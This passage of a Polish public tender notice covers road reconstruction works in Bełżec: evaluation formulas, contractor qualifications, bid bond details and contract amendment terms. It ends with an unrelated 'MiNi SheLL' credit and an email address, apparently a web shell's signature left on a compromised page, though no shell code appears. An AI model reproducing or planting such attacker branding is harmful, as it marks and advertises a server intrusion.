Hetmańska w Bełżcu&#34;.<br/>Zakres robót będzie obejmował przebudowę drogi wraz z poboczami w granicy pasa drogowego.<br/>Projekt przewiduje przebudowę drogi poprzez wykonanie jezdni bitumicznej w istniejący śladzie drogi tłuczniowej, w<br/>granicach pasa drogowego.<br/>Szczegółowe rozwiązania sytuacyjne przedstawiano na załączonej j dokumentacji graficzne j stanowiące j integralną część<br/>projektu zagospodarowania terenu.<br/>Zadanie nr 11 Przebudowa drogi wewnętrznej ul. Świerkowa w Bełżcu dz. nr 2186, 2321.<br/>1. Przedmiot inwestycji.<br/>Przedmiotem inwestycji jest : „Przebudowa drogi wewnętrznej ul. Świerkowa w Bełżcu&#34;.<br/>Zakres robót będzie obejmował przebudowę drogi wraz z poboczami w granicy pasa drogowego.<br/>Projekt przewiduje przebudowę drogi poprzez wykonanie jezdni bitumicznej w istniejącym śladzie drogi tłuczniowej, w<br/>granicach pasa.<br/>Szczegółowe rozwiązania sytuacyjne przedstawiano na załączonej j dokumentacji graficznej stanowiące j integralną część<br/>projektu zagospodarowania terenu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <p class="mb-0">45234129-6 - Roboty budowlane w zakresie torów kolei miejskiej</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45112000-5 - Roboty w zakresie usuwania gleby</p> <p class="mb-0">32400000-7 - Sieci</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert, które nie zostały odrzucone, na podstawie następujących kryteriów<br/>oceny ofert:<br/>1) cena (C) - waga kryterium 60% = 60pkt<br/>2) długość okresu gwarancji na roboty budowlane oraz zamontowane materiały i urządzenia (G) – waga kryterium- 40% = 40pkt<br/>RAZEM 100 % = 100pkt<br/>Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryteriów oceny ofert, przyjmując zasadę, że 1% = 1<br/>punkt.<br/>W ramach kryterium „cena” (C) oceniana będzie cena łączna brutto za wykonanie całości zamówienia podana w formularzu oferty.<br/>W ramach kryterium „Cena” ocena ofert zostanie dokonana przy zastosowaniu wzoru:<br/>C = C n x 60pkt<br/>C o<br/>gdzie:<br/>C – ilość punktów w kryterium cena<br/>C o – cena oferty badanej<br/>C n – najniższa cena ofertowa spośród ofert nieodrzuconych<br/>W ramach kryterium „Długość okresu gwarancji na roboty budowlane oraz zamontowane materiały i urządzenia” liczone w okresach<br/>miesięcznych:<br/>W przypadku zaoferowania minimalnej długości okresu gwarancji tj. 36 miesięcy, Wykonawca otrzyma zero (0) punktów.<br/>W przypadku zaoferowania maksymalnej długości okresu gwarancji tj. 60 miesięcy, Wykonawca otrzyma czterdzieści (40) punktów.<br/>W przypadku zaoferowania gwarancji pomiędzy 36 a 60 miesięcy wykonawca otrzyma pkt wg wzoru:<br/>G o<br/>G = ----------- x 40 pkt<br/>G max.<br/>Gdzie:<br/>G - wartość punktowa, którą należy wyznaczyć,<br/>Go - okres gwarancji podany w badanej ofercie,<br/>G max. - najdłuższy oferowany okres gwarancji,<br/>Zamawiający określa minimalną oraz maksymalną długość okresu gwarancji, w przedziale od 36 miesięcy do 60 miesięcy. W<br/>przypadku zaoferowania przez Wykonawcę długości krótszego niż 36 miesięcy, Zamawiający ofertę odrzuci. W przypadku, gdy<br/>Wykonawca w ogóle nie wskaże w ofercie oferowanego okresu gwarancji Zamawiający przyjmie, że Wykonawca nie oferuje<br/>gwarancji i ofertę odrzuci. Wykonawca może zaproponować długość okresu gwarancji dłuższy niż wyznaczony maksymalny 60<br/>miesięcy, jednak w tym przypadku Zamawiający przyjmie do obliczeń wartość 60 miesięcy – najdłuższy przyjęty w kryterium oceny<br/>ofert „Długość okresu gwarancji na roboty budowlane oraz zamontowane materiały i urządzenia”. Wykonawcy oferują długości<br/>okresu gwarancji w pełnych miesiącach (w przedziale od 36 do 60 miesięcy).<br/>Deklarowany w formularzu ofertowym okres będzie wprowadzony do umowy. Zamawiający określił ogólne warunki w karcie<br/>gwarancyjnej wykonanych robót stanowiącej załącznik umowy. Wady ujawnione w okresie gwarancji będą usuwane przez<br/>Wykonawcę na zasadach opisanych w karcie gwarancji.<br/>Obliczenie łącznej liczby punktów uzyskanych przez Wykonawcę (spośród ofert podlegających ocenie) zostanie wyliczone na<br/>podstawie sumy uzyskanych punktów w kryteriach opisanych powyżej zgodnie z wzorem:<br/>P = C + G<br/>P - łączna liczba punktów (suma) przyznanych Wykonawcy w ramach wszystkich kryteriów<br/>C - łączna liczba punktów przyznanych Wykonawcy w kryterium „Cena”<br/>TP - łączna liczba punktów przyznanych Wykonawcy w kryterium „Długość okresu gwarancji na roboty budowlane oraz<br/>zamontowane materiały i urządzenia”<br/>Oferta może uzyskać maksymalnie 100 punktów w kryteriach oceny ofert.<br/>Zgodnie z art. 248 ustawy Pzp jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia<br/>taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę<br/>w kryterium o najwyższej wadze.<br/>Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, Zamawiający wybiera ofertę z najniższą ceną.<br/>Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w ust. 2, Zamawiający wzywa Wykonawców, którzy złożyli te<br/>oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">„Długość okresu gwarancji na roboty budowlane oraz zamontowane materiały i urządzenia”</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu i spełniają warunki udziału w<br/>postępowaniu dotyczące: postępowaniu<br/>Zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie określa warunku w ww. zakresie.<br/>Uprawnień do prowadzenie określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie określa warunku w ww. zakresie<br/>Uprawnień sytuacji ekonomicznej lub finansowej:<br/>Wykonawca spełni warunek jeśli posiada odpowiednie ubezpieczenie odpowiedzialności cywilnej na kwotę minimum 2 000<br/>000,00 zł.<br/>Zdolności technicznej lub zawodowej w zakresie:<br/>Opis sposobu dokonywania oceny spełniania tego warunku:<br/>A) Wykonawca winien wykazać, że wykonał należycie i zgodnie z przepisami prawa budowlanego i prawidłowo ukończył nie<br/>wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest<br/>krótszy- w tym okresie:<br/>1. co najmniej 2 roboty budowlane polegające na budowie, przebudowie lub rozbudowie drogi/ulicy o nawierzchni<br/>bitumicznej o wartości co najmniej 2 000 000,00 zł brutto KAŻDA robota<br/>lub<br/>2. co najmniej 2 roboty budowlane polegające na budowie, przebudowie lub rozbudowie drogi/ulicy o nawierzchni<br/>bitumicznej o wartości co najmniej 2 000 000,00 zł brutto KAŻDA robota<br/>oraz dołączy dowody (referencje) określające, czy roboty budowlane zostały wykonane lub w przypadku świadczeń<br/>okresowych lub ciągłych są wykonywane należycie.<br/>B) Osoby :<br/>1). STANOWISKO: minimum jedna osoba (która będzie pełnić funkcję kierownika budowy)<br/>UPRAWNIENIA: uprawnienia budowlane do kierowania robotami budowlanymi w specjalności inżynieryjnej drogowej,<br/>których zakres uprawnia go do kierowania robotami objętymi przedmiotem zamówienia<br/>DOŚWIADCZENIE: w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności<br/>jest krótszy - w tym okresie pełnił funkcję kierownika budowy przy realizacji robót która polegała na budowie, przebudowie<br/>lub rozbudowie drogi o nawierzchni bitumicznej o wartości robót nie mniejszej niż 1.000.000,00 zł<br/>2). STANOWISKO: minimum jedna osoba (która będzie pełnić funkcję kierownika robót)<br/>UPRAWNIENIA: uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci<br/>wodociągowych i kanalizacyjnych których zakres uprawnia go do kierowania robotami objętymi przedmiotem Zamówienia<br/>3).STANOWISKO: minimum jedna osoba (która będzie pełnić funkcję kierownika robót)<br/>UPRAWNIENIA: uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie<br/>instalacji i urządzeń: elektrycznych i elektroenergetycznych których zakres uprawnia go do kierowania robotami objętymi<br/>przedmiotem Zamówienia<br/>4). STANOWISKO: minimum jedna osoba (która będzie pełnić funkcję kierownika robót)<br/>UPRAWNIENIA: uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w specjalności<br/>inżynieryjnej kolejowej których zakres uprawnia go do kierowania robotami objętymi przedmiotem zamówienia<br/>UWAGA Wykonawca powinien w wykazie robót wyraźnie określić zakres robót, aby można było ustalić, czy spełnia warunek<br/>udziału w postępowaniu. a. Zamawiający może, oceniając zdolność techniczną lub zawodową, na każdym etapie postępowania, uznać, że<br/>Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w<br/>szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze<br/>Wykonawcy może mieć negatywny wpływ na realizację zamówienia na każdym etapie postępowania (art. 116 ust. 2 ustawy<br/>Pzp).<br/>b. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia wykazując warunek udziału w postępowaniu mogą polegać na<br/>zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są<br/>wymagane.<br/>c. Sposób wykazania warunków udziału w postępowaniu wskazano w rozdziale 8 SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykonawca winien wykazać, że wykonał należycie i zgodnie z przepisami prawa budowlanego i prawidłowo ukończył nie wcześniej<br/>niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym<br/>okresie:<br/>1. co najmniej 2 roboty budowlane polegające na budowie, przebudowie lub rozbudowie drogi/ulicy o nawierzchni bitumicznej o<br/>wartości co najmniej 2 000 000,00 zł brutto KAŻDA robota<br/>lub<br/>2. co najmniej 2 roboty budowlane polegające na budowie, przebudowie lub rozbudowie drogi/ulicy o nawierzchni bitumicznej o<br/>wartości co najmniej 2 000 000,00 zł brutto KAŻDA robota<br/>oraz dołączy dowody (referencje) określające, czy roboty budowlane zostały wykonane lub w przypadku świadczeń okresowych lub<br/>ciągłych są wykonywane należycie.<br/>B) Osoby :<br/>1). STANOWISKO: minimum jedna osoba (która będzie pełnić funkcję kierownika budowy)<br/>UPRAWNIENIA: uprawnienia budowlane do kierowania robotami budowlanymi w specjalności inżynieryjnej drogowej, których zakres<br/>uprawnia go do kierowania robotami objętymi przedmiotem zamówienia<br/>DOŚWIADCZENIE: w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest<br/>krótszy - w tym okresie pełnił funkcję kierownika budowy przy realizacji robót która polegała na budowie, przebudowie lub<br/>rozbudowie drogi o nawierzchni bitumicznej o wartości robót nie mniejszej niż 1.000.000,00 zł<br/>2). STANOWISKO: minimum jedna osoba (która będzie pełnić funkcję kierownika robót)<br/>UPRAWNIENIA: uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci<br/>wodociągowych i kanalizacyjnych których zakres uprawnia go do kierowania robotami objętymi przedmiotem Zamówienia<br/>3).STANOWISKO: minimum jedna osoba (która będzie pełnić funkcję kierownika robót)<br/>UPRAWNIENIA: uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie instalacji i<br/>urządzeń: elektrycznych i elektroenergetycznych których zakres uprawnia go do kierowania robotami objętymi przedmiotem<br/>Zamówienia<br/>4). STANOWISKO: minimum jedna osoba (która będzie pełnić funkcję kierownika robót)<br/>UPRAWNIENIA: uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w specjalności<br/>inżynieryjnej kolejowej których zakres uprawnia go do kierowania robotami objętymi przedmiotem zamówienia</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca jest zobowiązany wnieść wadium w wysokości 50 000,00 PLN <br/>(słownie zł: pięćdziesiąt tysięcy złotych 00\100).<br/>Wadium może być wniesione w jednej lub kilku następujących formach:<br/>a)	pieniądzu;<br/>b)	gwarancjach bankowych;<br/>c)	gwarancjach ubezpieczeniowych;<br/>d)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek bankowy Zamawiającego:<br/>Bank Spółdzielczy w Lubyczy Królewskiej<br/>Nr konta: 36 9617 0005 0000 1111 2000 0002<br/>z adnotacją „Wadium – Znak sprawy: ZP.271.1.8.2022”<br/>Za skuteczne wniesienie wadium w pieniądzu, Zamawiający uzna wadium, które zostanie zaksięgowane na rachunku bankowym Zamawiającego przed upływem terminu składania ofert.<br/>Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej – przed upływem terminu składania ofert.<br/>W przypadku wnoszenia wadium w formie gwarancji bankowej lub ubezpieczeniowej, lub poręczenia gwarancja lub poręczenie musi być nieodwołalne, bezwarunkowe i płatne na pierwsze pisemne żądanie zamawiającego, sporządzone zgodnie z obowiązującymi przepisami i powinna zawierać następujące elementy:<br/>a)	nazwę: dającego zlecenie (Wykonawcy), beneficjenta gwarancji\poręczenia (Zamawiającego), gwaranta lub poręczyciela oraz wskazanie ich siedzib,<br/>b)	kwotę wadium<br/>c)	termin ważności gwarancji\poręczenia w formule: „od dnia…..-do dnia…..”,<br/>d)	zobowiązanie gwaranta\poręczyciela do zapłacenia kwoty wskazanej w gwarancji\poręczeniu na pierwsze żądanie Zamawiającego w sytuacjach zatrzymania wadium określonych w przepisach ustawy.<br/>Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania z ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp.<br/>Zasady dokonywania zatrzymania i zwrotu wadium określono w przepisach art. 98 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i<br/>zawarcia umowy w sprawie zamówienia publicznego.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a) oświadczenia o których mowa w pkt. 8.1 SWZ składa z ofertą każdy<br/>z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w postępowaniu lub kryteriów selekcji w zakresie, w jakim każdy z Wykonawców wykazuje<br/>spełnianie warunków udziału w postępowaniu lub kryteriów selekcji.<br/>b) w przypadku, o którym mowa w rozdziale 6.3 SWZ Wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy. Oświadczenie należy<br/>złożyć wg wymogów załącznika nr 6 do SWZ. Oświadczenie to jest podmiotowym środkiem dowodowym.<br/>c) zobowiązani są oni na wezwanie Zamawiającego, złożyć podmiotowe środki dowodowe, o których mowa w pkt. 8.3 SWZ,<br/>przy czym podmiotowe środki dowodowe, o których mowa:<br/> w pkt. 8.3.1 SWZ składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/-ą spełnienie warunku<br/> w pkt. 8.3.2 SWZ składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać<br/>przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> Zgodnie z zapisami umowy, która stanowi załącznik numer 2 do umowy. <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Oprócz przypadków, o których mowa w art. 454 i 455 ustawy – Prawo zamówień publicznych, strony dopuszczają<br/>możliwość wprowadzania zmiany umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w<br/>przypadku wystąpienia którejkolwiek z następujących okoliczności:<br/>1) przedłużenie terminu realizacji zamówienia, o którym mowa w § 2 ust. 1, może nastąpić w przypadku wystąpienia<br/>okoliczności siły wyższej, przez którą należy rozumieć zdarzenia niezależne od żadnej ze stron, zewnętrzne, niemożliwe do<br/>zapobieżenia, które nastąpiło po dniu wejścia w życie umowy, w szczególności: wojny, akty terroryzmu, klęski żywiołowe,<br/>strajki oraz akty władzy i administracji publicznej, przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni,<br/>odpowiadającą okresowi występowania okoliczności siły wyższej,<br/>2) przedłużenie terminu realizacji zamówienia, o którym mowa w § 2 ust. 1, może nastąpić w przypadku skierowania przez<br/>Zamawiającego do Wykonawcy pisemnego żądania wstrzymania robót budowlanych, stanowiących przedmiot zamówienia<br/>lub wydania zakazu prowadzenia robót budowlanych, stanowiących przedmiot zamówienia przez organ administracji<br/>publicznej, o ile żądanie lub wydanie zakazu nie nastąpiło z przyczyn, za które Wykonawca ponosi odpowiedzialność, przy<br/>czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni, odpowiadającą okresowi na jaki Wykonawcy<br/>nakazano wstrzymanie robót budowlanych lub zakazano prowadzenia robót budowlanych<br/>3) przedłużenie terminu realizacji zamówienia, o którym mowa w § 2 ust. 1, może nastąpić w przypadku wystąpienia kolizji z<br/>instalacjami wewnętrznymi nieujawnionymi w dokumentacji projektowej, lub innymi robotami prowadzonymi przez innegowykonawcę, przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni niezbędną Wykonawcy na usunięcie<br/>kolizji z instalacjami wewnętrznymi nieujawnionymi w dokumentacji projektowej lub o liczbę dni niezbędnych do wykonania<br/>robót przez innego wykonawcę – o ile usunięcie kolizji wymagać będzie przedłużenia terminu realizacji;<br/>4) przedłużenie terminu realizacji zamówienia, o którym mowa w § 2 ust. 1, może nastąpić w przypadku wystąpienia<br/>konieczności wprowadzenia w dokumentacji projektowej zmian, powodujących wstrzymanie lub przerwanie robót<br/>budowlanych, stanowiących przedmiot zamówienia, przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę<br/>dni niezbędną do wprowadzenia zmian w dokumentacji projektowej oraz do przeprowadzenia uzgodnień (ustaleń) z<br/>właściwymi organami, uzyskania opinii właściwych organów oraz wydania decyzji przez właściwe organy, przy czym<br/>wprowadzenie w dokumentacji projektowej zmian nie może skutkować zwiększeniem (zmianą) zakresu świadczenia<br/>Wykonawcy zawartego w ofercie, stanowiącej załącznik nr 3 do umowy oraz zwiększeniem wynagrodzenia Wykonawcy, o<br/>którym mowa w § 6 ust. 1,<br/>5) przedłużenie terminu realizacji zamówienia, o którym mowa w § 2 ust. 1, może nastąpić w przypadku wystąpienia<br/>warunków geologicznych lub hydrologicznych odmiennych od założonych w dokumentacji projektowej i powodujących<br/>konieczność wstrzymania robót lub konieczność ich wykonania przy wykorzystaniu odmiennych od zaprojektowanych<br/>rozwiązań technicznych, przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni niezbędną do<br/>wyeliminowania utrudnień związanych z ich wystąpieniem,<br/>6) konieczności wykonania robót zamiennych (do których wykonania wystarczy zgoda zamawiającego oraz projektanta),<br/>rozumianych jako wykonanie przez Wykonawcę zamówienia podstawowego w sposób odmienny od sposobu określonego<br/>w umowie,<br/>7) przedłużenia terminu wykonania zamówienia w zakresie niezbędnym do wykonania robót zleconych na podstawie art.<br/>455 ust. 1 pkt 1, 3, 4 lub ust. 2 ustawy Prawo zamówień publicznych,<br/>8) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym bezpośredni wpływ na realizację przedmiotu<br/>zamówienia lub świadczenia stron umowy - cd w sekcji IX <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-12-05 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem platformy zakupowej. Składając ofertę w postaci elektronicznej Ofertę należy złożyć na Platformie pod adresem: https://belzec.ezamawiajacy.pl,w zakładce „OFERTY&#34;</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-12-05 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-01-04</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 9) w przypadku zmiany albo rezygnacji z podwykonawcy, na którego zasoby wykonawca powoływał się w celu wykazania<br/>spełniania warunków udziału w postępowaniu Wykonawca jest obowiązany wykazać Zamawiającemu, iż proponowany inny<br/>podwykonawca lub Wykonawca samodzielnie spełnia warunki udziału w postępowaniu, w stopniu nie mniejszym niż<br/>wymagany w trakcie postępowania o udzielenie zamówienia, poprzez przedstawienie w tym celu odpowiednich<br/>dokumentów, potwierdzających spełnianie warunków udziału w postępowaniu,<br/>10) zmiany sposobu rozliczania Umowy lub dokonywania płatności na rzecz Wykonawcy wskutek zaistnienia przyczyn<br/>organizacyjnych lub finansowych leżących po stronie Zamawiającego, w tym na skutek zawartej przez Zamawiającego<br/>umowy o dofinansowanie zadania.<br/>11) wszelkie zmiany, które będą konieczne do zagwarantowania zgodności umowy z wchodzącymi w życie po terminie<br/>składania ofert lub po zawarciu umowy przepisami prawa w szczególności przepisami o podatku od towarów i usług w<br/>zakresie wynikającym z tych przepisów,<br/>12) Zamawiający dopuszcza zmiany umowy w przypadku wystąpienia, okoliczności związanych z wpływem COVID-19 na<br/>możliwość prawidłowej i terminowej realizacji Umowy, Strony niezwłocznie, wzajemnie informują się o wpływie okoliczności<br/>związanych z wystąpieniem COVID-19 na należyte wykonanie umowy, o ile taki wpływ wystąpił lub jest wysoce<br/>prawdopodobne, że wystąpi. Strony umowy potwierdzają ten wpływ dołączając do informacji, o której mowa w zdaniu<br/>pierwszym, oświadczenia lub dokumenty, które mogą dotyczyć w szczególności:<br/>- nieobecności pracowników lub osób świadczących pracę za wynagrodzeniem na innej podstawie<br/>niż stosunek pracy, które uczestniczą w realizacji Umowy;<br/>- decyzji wydanych przez Głównego Inspektora Sanitarnego lub działającego z jego upoważnienia państwowego<br/>wojewódzkiego inspektora sanitarnego, w związku z przeciwdziałaniem COVID-19 nakładających na wykonawcę obowiązek<br/>podjęcia określonych czynności zapobiegawczych lub kontrolnych;<br/>- poleceń lub decyzji wydanych przez wojewodów, ministra właściwego do spraw zdrowia lub Prezesa Rady Ministrów,<br/>związanych z przeciwdziałaniem COVID-19;<br/>- wstrzymania dostaw produktów, komponentów produktu lub materiałów, trudności w dostępie do<br/>sprzętu lub trudności w realizacji usług transportowych;<br/>- innych okoliczności, które uniemożliwiają bądź w istotnym stopniu ogranicza możliwość<br/>wykonania umowy;<br/>- okoliczności, o których mowa w pkt 1-5, w zakresie w jakim dotyczą one podwykonawcy lubdalszego podwykonawcy.<br/>- każda ze stron umowy, może żądać przedstawienia dodatkowych oświadczeń lub dokumentów<br/>potwierdzających wpływ okoliczności związanych z wystąpieniem COVID-19 na należyte<br/>wykonanie umowy.<br/>- strona umowy, na podstawie otrzymanych oświadczeń lub dokumentów, o których mowa w ust. 11,<br/>w terminie 14 dni od dnia ich otrzymania, przekazuje drugiej stronie swoje stanowisko, wraz z<br/>uzasadnieniem, odnośnie do wpływu okoliczności, na należyte jej wykonanie. Jeżeli strona umowy<br/>otrzymała kolejne oświadczenia lub dokumenty, termin liczony jest od dnia ich otrzymania.<br/>Zamawiający, po stwierdzeniu, że okoliczności związane z wystąpieniem COVID-19, o których mowa powyżej, faktycznie<br/>istotnie wpływają na należyte wykonanie umowy, w uzgodnieniu z wykonawcą dokonuje zmiany umowy, w szczególności<br/>przez:<br/>- zmianę terminu wykonania umowy lub jej części, lub czasowe zawieszenie wykonywania umowy<br/>lub jej części, z tym, że zmiana terminu (wydłużenie) nie może być dłuższe niż czas trwania<br/>przeszkody w realizacji umowy,<br/>- zmianę sposobu wykonywania przedmiotu umowy,<br/>Ciąg dalszy w dokumentach postępowania.

Creat By MiNi SheLL
Email: jattceo@gmail.com